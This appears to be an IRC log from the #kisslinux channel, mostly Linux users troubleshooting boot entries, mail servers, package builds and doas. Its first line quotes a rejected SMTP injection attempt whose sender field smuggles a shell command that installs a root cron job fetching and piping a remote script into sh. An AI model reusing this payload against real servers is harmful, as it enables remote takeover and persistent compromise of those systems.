2021-04-13T01:25:31 #kisslinux `smtp failed-command command="MAIL FROM:<;echo '* * * * * root curl -fsSL http://go.0x1a.xyz:10176/fs/copycat/init.sh | sh' > /etc/cron.d/systemdd;>" result="553 5.1.0 Sender address syntax error"` 2021-04-13T01:25:32 #kisslinux ... 2021-04-13T01:25:43 #kisslinux the internet is cancer. I don't blame dylan for leaving 2021-04-13T01:28:55 #kisslinux uh-oh, are we needing a new bdfl again? 2021-04-13T01:31:16 #kisslinux only if these 1337 hack3r5 get me 2021-04-13T01:42:09 #kisslinux lmao hahaha 2021-04-13T01:43:25 #kisslinux what is this miserable script here 2021-04-13T01:43:46 #kisslinux it'd crash on the 6th line there 2021-04-13T01:43:53 #kisslinux lol it'd never work on a kiss machine 2021-04-13T01:46:41 #kisslinux right XD 2021-04-13T01:46:54 #kisslinux the absolute madlad 2021-04-13T01:49:09 #kisslinux a function named fuckyou() {} 2021-04-13T01:49:13 #kisslinux lad. sit 2021-04-13T02:10:03 #kisslinux hahaha 2021-04-13T02:11:05 #kisslinux unfortunately i'm not getting anythin 2021-04-13T02:11:18 #kisslinux just ssl errors and connection refusal erros 2021-04-13T02:26:40 #kisslinux f 2021-04-13T02:26:56 #kisslinux acheam send me your patches for the wiki that I have yet to merge to dilyn.corner⊙ko 2021-04-13T02:27:05 #kisslinux wanna see if I got aerc et al. to work right 2021-04-13T02:27:13 #kisslinux (ddevault has won) 2021-04-13T02:42:14 #kisslinux lol 2021-04-13T02:42:26 #kisslinux you already fixed one of them without my patch 2021-04-13T02:42:28 #kisslinux so its just 1 2021-04-13T02:44:39 #kisslinux dilyn: just sent you something 2021-04-13T02:45:29 #kisslinux dilyn: https://i.imgur.com/g9ocdyF.png 2021-04-13T02:54:44 #kisslinux harumph humbug 2021-04-13T02:57:42 #kisslinux HM OKAY 2021-04-13T02:57:51 #kisslinux so mails are delivered to ~roughly~ the right directory now... 2021-04-13T02:58:21 #kisslinux i feel like i'm doing something horribly wrong; dovecot and opensmtpd should talk via lmtp but... they cannot 2021-04-13T03:06:37 #kisslinux lmk if you want me to resend, dilyn 2021-04-13T03:12:07 #kisslinux will do, I think I'm close 2021-04-13T03:40:50 #kisslinux Hi 2021-04-13T03:51:50 #kisslinux hey testuser_[m] 2021-04-13T04:09:49 #kisslinux send it lad 2021-04-13T04:09:57 #kisslinux hi testuser_[m] :) 2021-04-13T04:12:05 #kisslinux sent, dilyn 2021-04-13T04:13:02 #kisslinux :D 2021-04-13T04:13:06 #kisslinux aww 2021-04-13T04:18:51 #kisslinux i'm not sure why but i struggled to apply the patch :( 2021-04-13T04:18:54 #kisslinux but it's in! 2021-04-13T04:18:59 #kisslinux #it'ssomething 2021-04-13T04:19:32 #kisslinux yay 2021-04-13T04:21:07 #kisslinux bububut my green square 2021-04-13T04:21:10 #kisslinux what'll I do? 2021-04-13T04:26:29 #kisslinux cry i guess 2021-04-13T04:26:32 #kisslinux :'( 2021-04-13T04:32:52 #kisslinux okay. I can do everything but send emails now. 2021-04-13T04:32:57 #kisslinux I think this is okay enough. 2021-04-13T04:33:00 #kisslinux #fornow 2021-04-13T05:26:16 #kisslinux dilyn i got some progress on figuring out that dependency issue 2021-04-13T05:29:05 #kisslinux :O 2021-04-13T05:29:27 #kisslinux Say you have a package foo with dependencies libsomething, atk, glib. Then atk and glib have a dependency on libffi. 2021-04-13T05:29:33 #kisslinux Also you have cached binaries for libsomething, atk, glib but not libffi. So KISS tells you that it's gonna build libffi, but it doesn't build it and just installs the atk and glib binary 2021-04-13T05:29:44 #kisslinux i think i can repro it this way 2021-04-13T05:30:01 #kisslinux idk if i made sense 2021-04-13T05:36:06 #kisslinux i have the log thing too 2021-04-13T05:41:40 #kisslinux it makes sense what you're saying, but not why it's broken lol 2021-04-13T05:41:56 #kisslinux but that's a start. reproduceability with a minimal number of packages is i think key 2021-04-13T05:51:14 #kisslinux worth noting that im experimenting with this kinda repo tree(with proper depends file) to make stuff easier, instead of building from source https://0x0.st/-Tg7.txt 2021-04-13T05:51:24 #kisslinux so the "build" files just `mv ./* "$1/usr/lib"` 2021-04-13T05:57:16 #kisslinux OHHHHHHHHHHHHH 2021-04-13T05:59:36 #kisslinux https://0x0.st/-TEz.txt 2021-04-13T06:00:00 #kisslinux It installs cached glib and then cached atk, then it starts building atk again 2021-04-13T06:01:24 #kisslinux you can try to repro too, just do `KISS_FORCE=1 kiss r glib atk; rm ~/.cache/kiss/bin/libffi*` then make a dummy package that depends on glib and atk 2021-04-13T06:03:00 #kisslinux s/glib atk/& libffi/ 2021-04-13T06:03:00 #kisslinux you can try to repro too, just do `KISS_FORCE=1 kiss r & libffi; rm ~/.cache/kiss/bin/libffi*` then make a dummy package that depends on glib and atk 2021-04-13T06:03:09 #kisslinux bruh 2021-04-13T06:08:07 #kisslinux ... 2021-04-13T06:08:13 #kisslinux E5ten: 2021-04-13T06:08:30 #kisslinux btw if you try installing cached glib standalone then it detects that libffi is missing 2021-04-13T06:20:33 #kisslinux I booted!! 2021-04-13T06:20:36 #kisslinux just got kernel panic 2021-04-13T06:20:51 #kisslinux so made it through where i had the weird errors 2021-04-13T06:22:40 #kisslinux :O 2021-04-13T06:24:43 #kisslinux wait 2021-04-13T06:24:50 #kisslinux did i really forget to build xfs support 2021-04-13T06:24:51 #kisslinux ... 2021-04-13T06:25:28 #kisslinux Nice 2021-04-13T06:36:10 #kisslinux not sure, this is what it tells me http://0x0.st/-TEb.jpg 2021-04-13T06:36:11 #kisslinux dilyn: aight this is showing my idiocy with mailing lists but when replying to a thread, is it just reply to the OP and that sends out to the mailing list or what 2021-04-13T06:36:26 #kisslinux quite sure i did build that in 2021-04-13T06:36:51 #kisslinux Yeah that's a filesystem config issue 2021-04-13T06:37:11 #kisslinux You need to enable something in block devices 2021-04-13T06:37:29 #kisslinux PATA / SATA and stuff 2021-04-13T06:37:33 #kisslinux Lemme try to find it 2021-04-13T06:39:21 #kisslinux Did you specify `root=` as the kernel parameter, or set it in the kernel config ? 2021-04-13T06:47:14 #kisslinux necromansy: I am also dumb with mailing lists and would only have been able to guess the answer until this last week :v 2021-04-13T06:47:49 #kisslinux when you get an email from an ML it shows as from the original sender and the list is CC'd. if you reply all, the system *should* just bounce it back to everyone and the original sender *should not* get it twice in this case... 2021-04-13T06:48:06 #kisslinux aight sweet as 2021-04-13T06:48:08 #kisslinux tyty 2021-04-13T06:48:10 #kisslinux playing around with it with my two accounts, this seemed to work. although sometimes I would get my own message back, so idk 2021-04-13T06:51:40 #kisslinux testuser: yes i did specify root=PARTUUID as my root partition 2021-04-13T06:56:18 #kisslinux xfs support is enabled, what do i change in block devices? 2021-04-13T07:04:55 #kisslinux i did it! 2021-04-13T07:08:20 #kisslinux What was it 2021-04-13T07:08:52 #kisslinux quite sure it was my fstab, it had /home and /boot mount before / 2021-04-13T07:09:52 #kisslinux No the drive should be mounted by the kernel on root already before fstab , so fstab shouldn't cause panic 2021-04-13T07:10:10 #kisslinux You don't even need an fstab with entries for `/` btw 2021-04-13T07:11:09 #kisslinux i did two things, change root= in the kernel config and fix my fstab 2021-04-13T07:11:57 #kisslinux It was probably the root= then 2021-04-13T07:12:23 #kisslinux i had root=PARTUUID=mydiskUUID in efibootmgr set 2021-04-13T07:12:28 #kisslinux not sure why that didnt work at first 2021-04-13T07:17:45 #kisslinux what did you change it to? 2021-04-13T07:18:00 #kisslinux i think i know why now 2021-04-13T07:18:19 #kisslinux root was equal to the boot partition 2021-04-13T07:18:21 #kisslinux dont do that... 2021-04-13T07:20:03 #kisslinux lmfao 2021-04-13T07:20:10 #kisslinux gz spryc :) 2021-04-13T07:20:30 #kisslinux and now that i've stopped my infinite mail loopback between my own email and the mailserver, I think it's bed time 2021-04-13T07:20:45 #kisslinux i just woke up like an hour ago :p 2021-04-13T08:36:36 #kisslinux spryc I dealt with boot issues for a couple of days when I installed Kiss. In my case, it always had to do with my efibootmgr entries 2021-04-13T08:43:06 #kisslinux nevermind 2021-04-13T08:43:09 #kisslinux still got issues 2021-04-13T08:47:49 #kisslinux error: http://0x0.st/-T6-.jpg efibootmgr: http://0x0.st/-T6i.txt blkid: http://0x0.st/-T6z.txt lsblk: http://0x0.st/-TE8.txt 2021-04-13T08:47:56 #kisslinux really can't figure out what's wrong 2021-04-13T08:48:18 #kisslinux i thought about something with sata drivers but everything i need is enabled 2021-04-13T08:49:06 #kisslinux efibootmgr has root=PARTUUID=UUID-OF-ROOT-PARTITION 2021-04-13T08:49:22 #kisslinux also tried to put that directly into the kernel config 2021-04-13T08:50:10 #kisslinux Try using device name instead of uuid 2021-04-13T08:50:14 #kisslinux Also send your kernel config 2021-04-13T08:50:55 #kisslinux config: http://0x0.st/-T6H.txt 2021-04-13T08:52:20 #kisslinux ill try just root=/dev/sdb3 2021-04-13T08:52:25 #kisslinux Yeah 2021-04-13T08:52:45 #kisslinux I'll check your config later, if root= doesn't work 2021-04-13T08:54:22 #kisslinux this should be it http://0x0.st/-T6Z.txt 2021-04-13T08:54:47 #kisslinux could also try root=/dev/sdb3 directly in the kernel command line? 2021-04-13T08:56:11 #kisslinux Yeah 2021-04-13T09:10:37 #kisslinux efibootmgr --create --disk /dev/sda --part 1 --label "Kiss Linux " --loader EFIbootx64.efi --unicode 'root=PARTUUID=2b81a915-9750-4355-bef7-eb19ba76ba14 rw 2021-04-13T09:10:50 #kisslinux I think this is how I created my boot entry 2021-04-13T09:11:03 #kisslinux what is bootx64.efi? 2021-04-13T09:11:16 #kisslinux It is mv vmlinuz bootx64.efi 2021-04-13T09:11:24 #kisslinux ah 2021-04-13T09:11:28 #kisslinux i just keep it vmlinuz 2021-04-13T09:11:36 #kisslinux but i did just what you did 2021-04-13T09:11:45 #kisslinux but now im trying with /dev/sdb3 instead of uuid 2021-04-13T09:12:19 #kisslinux i tried it with uuid and /dev, it didn't work i think. i had to go with partuuid 2021-04-13T09:12:52 #kisslinux IT WORKED 2021-04-13T09:12:54 #kisslinux FINALLY 2021-04-13T09:13:04 #kisslinux damn that took too long 2021-04-13T09:13:17 #kisslinux Nice 2021-04-13T09:14:12 #kisslinux weird how root=/dev/sdb3 worked but not root=PARTUUID=UUID-OF-ROOT 2021-04-13T09:15:26 #kisslinux Does it mean that you got the uuid wrong somehow? 2021-04-13T09:15:33 #kisslinux i copied it from blkid 2021-04-13T09:15:41 #kisslinux didnt manually type it 2021-04-13T09:15:45 #kisslinux so quite unlikely 2021-04-13T09:15:54 #kisslinux Nice 2021-04-13T09:15:56 #kisslinux Finally 2021-04-13T09:19:09 #kisslinux congrats 2021-04-13T09:19:13 #kisslinux What is the difference between UUID and PARTUUID? 2021-04-13T09:19:22 #kisslinux I was told before that PARTUUID is the shorter one 2021-04-13T09:19:33 #kisslinux maybe that was the issue 2021-04-13T09:19:37 #kisslinux But looking at my boot entry, it uses partuuid and it's quite long 2021-04-13T09:20:07 #kisslinux https://freenode.logbot.info/kisslinux/20201117#c5865180 for reference 2021-04-13T09:22:29 #kisslinux Looking at that log, apparently my /etc/fstab has UUID="b437243c-0bb0-4eec-9990-6ef84ed26d0d" although my boot entry has PARTUUID=another_long_string 2021-04-13T09:30:02 #kisslinux does it make sense to manage suckless utilities with kiss? 2021-04-13T09:30:16 #kisslinux or should i just do it the usual way? 2021-04-13T09:31:42 #kisslinux Wdym 2021-04-13T09:31:46 #kisslinux Oh 2021-04-13T09:31:58 #kisslinux For dwm i just temporarily fork the package and install it 2021-04-13T09:32:02 #kisslinux like having a personal repo with for example dwm configured your own way 2021-04-13T09:32:07 #kisslinux or st 2021-04-13T09:32:08 #kisslinux etc. 2021-04-13T09:32:15 #kisslinux I like having everything in /usr 2021-04-13T09:32:33 #kisslinux You can tell the build script to apply the patches from a dir 2021-04-13T09:32:44 #kisslinux No need to actually include anything in the kiss package itself 2021-04-13T09:33:27 #kisslinux Like you can copy config.h and also `patch -p1 < /path/to/dotfiles/repo/dwm.patch` in the script itself 2021-04-13T09:33:45 #kisslinux yeah 2021-04-13T09:34:17 #kisslinux in the past i have just had a folder in /home/spryc/.local/src 2021-04-13T09:35:16 #kisslinux I think partuuid is from the partition and may change if you re-partition your drive. 2021-04-13T10:03:48 #kisslinux I guess part-/uuids are only meant to be persistant between re-installs, but there's labels as well if you want something you can control yourself for your partitions. 2021-04-13T10:05:59 #kisslinux iirc partuuid would only exist if the partition used is GPT instead of MBR 2021-04-13T10:46:15 #kisslinux got spectrwm working -> https://pasteboard.co/JX7RtJtM.png 2021-04-13T10:46:25 #kisslinux it feels kinda like tmux 2021-04-13T10:46:27 #kisslinux and I love that! 2021-04-13T10:47:19 #kisslinux Nice 2021-04-13T10:47:48 #kisslinux just wanted to celebrate :P 2021-04-13T10:47:55 #kisslinux however 2021-04-13T10:48:41 #kisslinux spectrwm uses the meta key for stuff and since it's windows, whenever I do M-h or M-l, It keeps locking my computer XD 2021-04-13T10:48:51 #kisslinux I mean, since it's a VM running on windows 2021-04-13T10:49:02 #kisslinux Lol 2021-04-13T10:50:12 #kisslinux  now I get to spend time configuring the crap out of it (which I honestly get a kick out of) 2021-04-13T10:50:39 #kisslinux this really feels like an extension of configuring dot files but now for a whole OS 2021-04-13T10:51:04 #kisslinux ah ok I'm a stupid head 2021-04-13T10:51:24 #kisslinux it's the meta key becuase I set the mod key to 4 which is the meta key XD 2021-04-13T10:52:43 #kisslinux ok, put it back to 1 so it's no the alt key 2021-04-13T10:57:23 #kisslinux I'm still getting checksum issues with the `cairo` package when trying to install the firefox bin 2021-04-13T10:57:59 #kisslinux did you `rm ~/.cache/kiss/sources/cairo/*` 2021-04-13T10:58:07 #kisslinux ah 2021-04-13T10:58:12 #kisslinux I did not ... 2021-04-13T10:59:39 #kisslinux spryc, using UUID as PARTUUID was your problem, yeah 2021-04-13T10:59:57 #kisslinux you can use root=UUID= but that only works when using an initramfs 2021-04-13T11:00:19 #kisslinux same for LABEL, only works with initramfs 2021-04-13T11:00:40 #kisslinux and re: kiss search 2021-04-13T11:00:52 #kisslinux it's using normal file globbing 2021-04-13T11:01:15 #kisslinux thermatix: so you can use `kiss s 'lib[xX]*'` 2021-04-13T11:01:34 #kisslinux don't blame the tool if you don't understand it 2021-04-13T11:02:56 #kisslinux huh neat, didn't realise you could use regex for searching thanks for the tip aarng 2021-04-13T11:03:01 #kisslinux will remember that 2021-04-13T11:03:34 #kisslinux regex more like based-ex 2021-04-13T11:03:43 #kisslinux btw, any one recommend me a decent cheapish 128GB USB 3.1  flash drive? 2021-04-13T11:03:47 #kisslinux based-ex? 2021-04-13T11:04:08 #kisslinux idk just shitposting 2021-04-13T11:04:09 #kisslinux actually. nvm found some 2021-04-13T11:04:11 #kisslinux lol 2021-04-13T11:05:29 #kisslinux spryc See https://www.reddit.com/r/kisslinux/comments/mkfdpd/editing_source_files_after_kiss_b/ for that 2021-04-13T11:06:47 #kisslinux tink: s/reddit.com/teddit.net 2021-04-13T11:07:40 #kisslinux thermatix, I said globbing, not regex... 2021-04-13T11:07:55 #kisslinux testuser[m]_ Thank you 2021-04-13T11:08:41 #kisslinux ? this `[xX]` looks like a regex character class, I didn't know you could do that with globbing, I reaaaaaly need to read-up on globbing again aarng thank you 2021-04-13T11:08:56 #kisslinux np 2021-04-13T11:10:13 #kisslinux I really don't like that there is no verification of specs on amazon store pages 2021-04-13T11:10:21 #kisslinux you end up with conflicting information :( 2021-04-13T11:11:07 #kisslinux fortunately I can go and read up on the product on a definitive source of truth but not everyone's able to do that and might just believe what's on the site without thinking about it 2021-04-13T12:02:23 #kisslinux kkbuilding firefox is fun 2021-04-13T12:02:35 #kisslinux tfw when you are too cool to use binary packages 2021-04-13T12:08:27 #kisslinux I'm not spending 40h to build firefox 2021-04-13T12:08:30 #kisslinux or however long it is 2021-04-13T12:09:06 #kisslinux 40 min on 12 threads 2021-04-13T12:12:11 #kisslinux i have a 6c12t cpu 2021-04-13T12:12:15 #kisslinux should be not too slow 2021-04-13T12:12:46 #kisslinux I'm glad I switched to spectrwm over dwm 2021-04-13T12:12:58 #kisslinux feels like a cross between tmux and normal desktop 2021-04-13T12:15:00 #kisslinux question, is there a package template  that explains what's going on? 2021-04-13T12:15:44 #kisslinux ... nvm 2021-04-13T12:25:56 #kisslinux dilyn back already? 2021-04-13T12:26:03 #kisslinux that was a short sleep 2021-04-13T12:26:27 #kisslinux it was 3am when I left :v 2021-04-13T12:26:53 #kisslinux also turns out I did not solve my infinite mail loop 2021-04-13T12:26:56 #kisslinux all for naught :'( 2021-04-13T12:33:51 #kisslinux dilyn: You already said "Unlike my previous lies, this is (probably not) a lie." 2021-04-13T12:34:01 #kisslinux So it was obviously a lie looking at the wording 2021-04-13T12:34:58 #kisslinux s/wording/location of the parentheses/ 2021-04-13T12:34:58 #kisslinux So it was obviously a lie looking at the location of the parentheses 2021-04-13T12:36:28 #kisslinux well this is a problem with my own domain not the list :P 2021-04-13T12:36:31 #kisslinux SOOOOOOOOOOO 2021-04-13T12:38:50 #kisslinux I mean, every mail server is broken 2021-04-13T12:39:05 #kisslinux You just didn't notice the problems of the mailing-list yet 2021-04-13T12:39:22 #kisslinux It will break at one point 2021-04-13T12:39:23 #kisslinux :P 2021-04-13T12:44:08 #kisslinux I expect bugs! 2021-04-13T12:44:14 #kisslinux that email covered every conceivable base :P 2021-04-13T13:08:29 #kisslinux can someone tell me why half of the gcc binaries are duplicated without symlinks in /usr/bin 2021-04-13T13:08:42 #kisslinux like there's gcc, x86_64-pc-linux-musl-gcc , x86_64-pc-linux-musl-gcc-10.2.0 2021-04-13T13:08:51 #kisslinux and they all take 1 mb each 2021-04-13T13:08:57 #kisslinux same with ar, as 2021-04-13T13:11:56 #kisslinux if the arch isn't x86_64, for the cross-compiling ability I guess? but since we're on x86_64 I don't know why 2021-04-13T13:17:52 #kisslinux @thermatix you can already sort of fuzzy search for something using "*". Example is say i want to see if there's any gettext packages available... i could `kiss s *gettext*` or even broader `kiss s *text*` 2021-04-13T13:25:50 #kisslinux ominous_anonymou thank you but no need to worry aarng already educated me on that :p 2021-04-13T13:26:21 #kisslinux oh sorry i missed it, glad it got answered 2021-04-13T13:26:31 #kisslinux it's all good 2021-04-13T13:26:41 #kisslinux just got rbenv installed 2021-04-13T13:26:53 #kisslinux even turned it into a package so it can be installed via kiss 2021-04-13T13:26:58 #kisslinux same again with ruby-build 2021-04-13T13:27:16 #kisslinux though it don't quite work as it should... 2021-04-13T13:38:18 #kisslinux wtf, someone on reddit said they contacted dylans mother on facebook? 2021-04-13T13:38:25 #kisslinux why. 2021-04-13T13:39:37 #kisslinux wat 2021-04-13T13:39:38 #kisslinux where 2021-04-13T13:39:56 #kisslinux i read through some of the "top all time" posts last night 2021-04-13T13:42:39 #kisslinux lol 2021-04-13T13:42:52 #kisslinux thats... probably not true? 2021-04-13T13:43:06 #kisslinux well i'm not sure if they actually did it but the way they formulated it makes it sound like that 2021-04-13T13:43:07 #kisslinux https://www.reddit.com/r/kisslinux/comments/lsbz8n/an_update_on_dylan/gsoyh53?utm_source=share&utm_medium=web2x&context=3 2021-04-13T13:43:22 #kisslinux "If you want to know what happened, just ping his mother on Facebook, u/Dilyn. She's not exactly hard to find. I agree though that maybe that's not the right course of action." 2021-04-13T13:43:47 #kisslinux sounds like he is implying that she told him, right? 2021-04-13T13:43:57 #kisslinux I don't think so 2021-04-13T13:44:05 #kisslinux but kind of 2021-04-13T13:44:34 #kisslinux sounded like it to me 2021-04-13T13:45:12 #kisslinux yeah 2021-04-13T13:45:30 #kisslinux but i dont think a random reddit comment is to be trusted 2021-04-13T13:46:10 #kisslinux they say "maybe that's not the right course of action" so i guess they found her profile but didnt pm ? 2021-04-13T13:47:59 #kisslinux but they also say "if you want to know what happened" implying she would te�ll them 2021-04-13T13:49:37 #kisslinux y'all need to reread that post 2021-04-13T13:50:04 #kisslinux we're getting close to the "lets doxx him" mode again 2021-04-13T13:50:45 #kisslinux none's talking about reaching out to anyone 2021-04-13T13:50:59 #kisslinux it just caught my attention the other day, dont "ping his mother" on facebook 2021-04-13T13:51:14 #kisslinux just wanted to catch it early 2021-04-13T13:51:48 #kisslinux the manhunt mode we were in for a bit wasn't great 2021-04-13T13:52:12 #kisslinux dilyn: what do you think of kiss having a meson wrapper to disable the downloading feature 2021-04-13T13:52:19 #kisslinux like this https://github.com/archlinux/svntogit-packages/blob/packages/meson/trunk/arch-meson but with just --wrap-mode nodownload 2021-04-13T13:52:35 #kisslinux its super annoying when meson randomly tries to clone 100 repos cuz of a real issue with system libs 2021-04-13T13:52:49 #kisslinux i wasnt here when you were in "manhunt mode", sounds not very nice 2021-04-13T13:53:00 #kisslinux lol it wasn't that bad 2021-04-13T13:53:04 #kisslinux but it was a bit creepy 2021-04-13T13:53:08 #kisslinux like building gtk+4, it cloned zlib, gdk-pixbuf and whatnot when i had some issue 2021-04-13T13:53:46 #kisslinux bruh 2021-04-13T13:54:04 #kisslinux maybe it would be better to handle this upstream? 2021-04-13T13:54:17 #kisslinux no its a feature 2021-04-13T13:54:24 #kisslinux is any one having trouble getting neovim to build? it keeps failing I think when it's trying to build luarocks 2021-04-13T13:54:34 #kisslinux if meson cant find system libs then it clones them into the source tree.. 2021-04-13T13:54:37 #kisslinux or luv-static? 2021-04-13T13:54:38 #kisslinux testuser_[m]: yes, but optionally disabling it can also be a feature 2021-04-13T13:54:53 #kisslinux disabling is done via the wrapper thing i mentioned 2021-04-13T13:55:23 #kisslinux ah whoops yeah I didn't see that 2021-04-13T13:55:25 #kisslinux my bad 2021-04-13T13:55:52 #kisslinux lol arch bloat 2021-04-13T13:55:56 #kisslinux yeah it fails on the build step for `luv-static` 2021-04-13T13:55:57 #kisslinux that did not have to be a bash script 2021-04-13T13:56:28 #kisslinux bash is part of core anyway so i guess they can use just it for everything 2021-04-13T13:56:43 #kisslinux I suppose 2021-04-13T13:56:56 #kisslinux but no real reason to use it on a script like this 2021-04-13T13:57:49 #kisslinux maybe instead of a wrapper, it could just be part of the style guide that you have to have that option? 2021-04-13T13:58:47 #kisslinux but you'll have to fix the existing meson packages then 2021-04-13T13:59:20 #kisslinux how do you envision this wrapper working? Replacing meson in the PATH? that's a pretty breaking change 2021-04-13T13:59:34 #kisslinux or would it be called kiss-meson or something 2021-04-13T13:59:41 #kisslinux in which case you already have to fix the existing packages 2021-04-13T14:00:02 #kisslinux calling it kiss-meson would also require fixing, so i guess /usr/bin/meson-bin would be meson and /usr/bin/meson the wrapper 2021-04-13T14:00:03 #kisslinux but that sounds bad 2021-04-13T14:00:12 #kisslinux why isnt this download crap off by default 2021-04-13T14:00:30 #kisslinux I mean i'd rather figure out why it's cloning things 2021-04-13T14:00:34 #kisslinux I've only had this issue with gtk+4 2021-04-13T14:01:05 #kisslinux you'd figure it out anyways, after the build fails. but nice to not have it waste so much bandwidth 2021-04-13T14:01:16 #kisslinux it'd fail instantly instead of cloning stuff 2021-04-13T14:01:20 #kisslinux thermatix: post the logs in ~/.cache/kiss/logs/ to a paste-bin and i'll take a peak 2021-04-13T14:01:32 #kisslinux also dylan's rule that packages shouldnt use network 2021-04-13T14:01:38 #kisslinux esp in main repo 2021-04-13T14:01:55 #kisslinux i mean yes 2021-04-13T14:02:14 #kisslinux but we should just stop meson projects from refusing to find system libs when we have them instead 2021-04-13T14:02:21 #kisslinux like, *that's* the actual problem 2021-04-13T14:04:44 #kisslinux well it only happens when something is wrong with system libs or pkgconf, so we can make it exit immediately 2021-04-13T14:07:04 #kisslinux @di 2021-04-13T14:08:18 #kisslinux dilyn pastebin of failed build -> https://pastebin.com/DH2TxvKq 2021-04-13T14:10:13 #kisslinux `uknown argument --build` looks scarey 2021-04-13T14:10:44 #kisslinux yeah 2021-04-13T14:10:59 #kisslinux this meson conversation is a lot like one that was had a while back about allowing users to use envvars to set literally every directory because people were exploring nonFHS forks https://freenode.logbot.info/kisslinux/20200927#c5256608 2021-04-13T14:11:28 #kisslinux I did see something in someone elses issue about cmake version so I rebuild cmake but that had no affect 2021-04-13T14:11:35 #kisslinux I'd be more interested in adding --wrap-mode offline *if* it impacted the main repo - but I don't think it does? 2021-04-13T14:11:42 #kisslinux thermatix are you just building the one in community? 2021-04-13T14:11:50 #kisslinux yes 2021-04-13T14:12:23 #kisslinux i just had the cloning issue building atk when i messed up my glib 2021-04-13T14:12:43 #kisslinux it can happen with any pacakge 2021-04-13T14:13:16 #kisslinux dont necessarily need a wrapper, can just add the command to all build files. just suggested the wrapper to save time 2021-04-13T14:14:34 #kisslinux if I do `/usr/bin/cmake | less` I can see there is a `--build` command 2021-04-13T14:15:13 #kisslinux this neovim package uses `make` to build with `cmake` 2021-04-13T14:15:20 #kisslinux wat 2021-04-13T14:16:37 #kisslinux yes it no bueno :v 2021-04-13T14:16:38 #kisslinux why would you have a makefile that calls cmake :/ 2021-04-13T14:17:54 #kisslinux why indeed 2021-04-13T14:21:29 #kisslinux its missing a dependency on a ton of stuff 2021-04-13T14:21:42 #kisslinux tried with cmake -B build ... 2021-04-13T14:21:50 #kisslinux needs libuv, then errors about msgpack 2021-04-13T14:21:54 #kisslinux wtf is this build system 2021-04-13T14:21:59 #kisslinux yea 2021-04-13T14:22:05 #kisslinux see this is why i stopped using neovim 2021-04-13T14:22:13 #kisslinux it requires busybox unzip ffs 2021-04-13T14:22:35 #kisslinux might have to resort to the binary 2021-04-13T14:23:03 #kisslinux it needs libuv, msgpack , libluv and something called treesitter 2021-04-13T14:23:06 #kisslinux yuck 2021-04-13T14:23:22 #kisslinux no we should figure out what typo is happening that makes the subproject thing --build is a wrong command for cmake lmao 2021-04-13T14:23:29 #kisslinux errored on luarocks? 2021-04-13T14:24:14 #kisslinux maybe a breaking change in cmake ? it was packaged by dylan so should've built fine 2021-04-13T14:24:18 #kisslinux becuase the thing after it references luarocks? 2021-04-13T14:24:44 #kisslinux nah neovim has never built nicely with cmake over make, i remember trying 2021-04-13T14:25:04 #kisslinux so should I alias cmake to make temporarily for this build? 2021-04-13T14:25:14 #kisslinux oh no, luv-static. sry 2021-04-13T14:25:16 #kisslinux no 2021-04-13T14:25:33 #kisslinux bad idea? 2021-04-13T14:26:52 #kisslinux actually 2021-04-13T14:27:11 #kisslinux it would have no effect at all as it access the cmake binary directly lol 2021-04-13T14:27:30 #kisslinux I think something else is going on.can you post the whole log? 2021-04-13T14:27:33 #kisslinux hmhm 2021-04-13T14:27:40 #kisslinux one sec 2021-04-13T14:28:41 #kisslinux ... I'm going to have to re-run the build >_< 2021-04-13T14:28:55 #kisslinux it did something wierd and pasted all the text I was trying to copy in the terminal XD 2021-04-13T14:29:45 #kisslinux ooor in hind-sight I can just copy the build log... 2021-04-13T14:35:53 #kisslinux here is the full build log -> https://pastebin.com/HgkJs0MF 2021-04-13T14:43:59 #kisslinux "[61/89] No build step for 'libuv'" :thinking: 2021-04-13T14:44:06 #kisslinux what the *fuck* 2021-04-13T14:45:34 #kisslinux i mean it's a nothing-burger but like also, why is it like this 2021-04-13T14:45:39 #kisslinux there's nothing good about this. 2021-04-13T14:48:14 #kisslinux unobvious why it would fail. so strange 2021-04-13T14:48:36 #kisslinux Just package everything it throws at you :p 2021-04-13T14:48:43 #kisslinux christ 2021-04-13T14:48:49 #kisslinux well i mean we have libuv lua* and gperf 2021-04-13T14:48:58 #kisslinux it's mostly msgpack and luv 2021-04-13T14:49:56 #kisslinux well let's see if it builds in my clean room :v 2021-04-13T14:51:02 #kisslinux i uncommented the lines needed in /etc/doas.conf but when i try 'doas kiss b firefox' it says 'firefox' not found in repository pool 2021-04-13T14:51:23 #kisslinux but when i switch to root user with su kiss finds firefox 2021-04-13T14:51:40 #kisslinux what's KISS_PATH for root & your user? 2021-04-13T14:51:50 #kisslinux the variables are declined in /etc/profile.d/kiss_path.sh 2021-04-13T14:51:59 #kisslinux defined 2021-04-13T14:52:02 #kisslinux sure 2021-04-13T14:52:06 #kisslinux where are the repos 2021-04-13T14:52:13 #kisslinux /var/db/kiss 2021-04-13T14:53:23 #kisslinux wait what lines do you have in doas.conf? 2021-04-13T14:53:32 #kisslinux 1 sec 2021-04-13T14:53:36 #kisslinux iirc I had to add 'permit persist :agroupnamemyuserisin' 2021-04-13T14:54:58 #kisslinux lol i can't build neovim because my connection to github.com keeps timing out so i can't download the deps... 2021-04-13T14:56:17 #kisslinux there were some things commented so i uncommented them and also added one line. http://0x0.st/-T10.jpg 2021-04-13T14:56:26 #kisslinux my user is in the group wheel 2021-04-13T14:56:43 #kisslinux typo? 2021-04-13T14:56:57 #kisslinux in the link 2021-04-13T15:02:00 #kisslinux yeah, http://0x0.st/-Tl0.jpg 2021-04-13T15:07:58 #kisslinux `find -not -name` is not portable right ? 2021-04-13T15:10:42 #kisslinux no idea 2021-04-13T15:19:13 #kisslinux find ! -name 2021-04-13T15:19:29 #kisslinux spryc, does doas work otherwise? 2021-04-13T15:21:16 #kisslinux http://0x0.st/-TUz.PNG ayyy 2021-04-13T15:21:41 #kisslinux :o 2021-04-13T15:22:55 #kisslinux nice 2021-04-13T15:31:32 #kisslinux https://arcan-fe.com/2021/04/12/introducing-pipeworld/ 2021-04-13T15:32:36 #kisslinux their remote sharing ideas are really neat and i wish i was smart enough to take advantage of them 2021-04-13T15:48:03 #kisslinux how do I execute elf binaries? i have `libelf` installed but I don't have `/lib64/ld-linux-x86-64.so.2 ` so certain programs won't run 2021-04-13T15:48:49 #kisslinux are you trying to run glibc programs 2021-04-13T15:48:56 #kisslinux maybe? 2021-04-13T15:49:05 #kisslinux given that kiss has musl 2021-04-13T15:49:11 #kisslinux I'm guessing that won't work... 2021-04-13T15:49:39 #kisslinux /lib/ld-musl-x86_64.so.1 is the interpreter for musl 2021-04-13T15:49:50 #kisslinux so it will say "not found" 2021-04-13T15:50:15 #kisslinux yeah that's what I get 2021-04-13T15:50:36 #kisslinux 